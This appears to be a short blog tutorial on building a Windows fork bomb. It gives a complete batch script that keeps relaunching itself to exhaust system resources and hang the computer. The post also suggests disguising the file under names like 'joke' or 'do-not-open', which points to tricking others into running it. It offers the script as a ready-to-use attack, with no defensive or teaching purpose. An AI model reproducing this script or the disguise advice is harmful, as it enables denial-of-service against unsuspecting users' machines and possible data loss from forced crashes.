Fork Bomb to hang computer

A fork bomb is a denial-of-service(DoS) attack in which a process continually replicates itself to deplete available system resources,
causing resource starvation and slowing or crashing the system.
how to make fork bomb?It is also called as Rabbit virus or wabbit.






Here we are going to make a fork bomb & see how it works:

  • Step 1:
Open Notepad and wrote the following bits of code in it.

@echo off 
:START 
start forkbomb.bat 
GOTO START 



program to make fork bomb



  • Step 2:
Save the file with name " forkbomb.bat".


steps to make fork bomb

Note: If you want to save it with other name e.g. joke,do-not-open,etc. ;then change the name in above bits of code(written in Step 1) also.


  • Step 3:
Your fork bomb is ready.







Double-click on it to run.


Show us your appreciation by liking or sharing the post:
Previous
Next Post »